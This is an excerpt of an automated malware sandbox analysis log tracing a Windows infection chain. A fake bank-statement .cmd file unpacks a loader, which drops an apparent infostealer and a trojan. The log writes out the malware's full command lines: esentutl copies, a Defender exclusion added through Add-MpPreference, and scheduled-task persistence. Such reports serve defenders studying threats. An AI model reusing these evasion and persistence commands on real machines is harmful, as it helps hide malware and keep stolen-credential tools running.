                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 29_2_02C320C429_2_02C320C4
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02CA4860 appears 683 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02C346D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02CA46D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02C34860 appears 683 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02C4894C appears 50 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02CB894C appears 50 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02D944DC appears 74 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DA894C appears 56 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DA89D0 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02D946D4 appears 244 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02D94860 appears 949 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02D94500 appears 33 times
                      Source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: armsvc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: armsvc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: neworigin.exe.11.dr, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.11.dr, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.11.dr, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.11.dr, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: neworigin.exe.11.dr, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.11.dr, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: neworigin.exe.11.dr, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.11.dr, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winCMD@54/27@5/3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D97FD2 GetDiskFreeSpaceA,4_2_02D97FD2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA6DC8 CoCreateInstance,4_2_02DA6DC8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-e5c7a92cab22d576-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-e5c7a92cab22d57673779169-b
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB06052.TMPJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-188
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /oJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????p.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
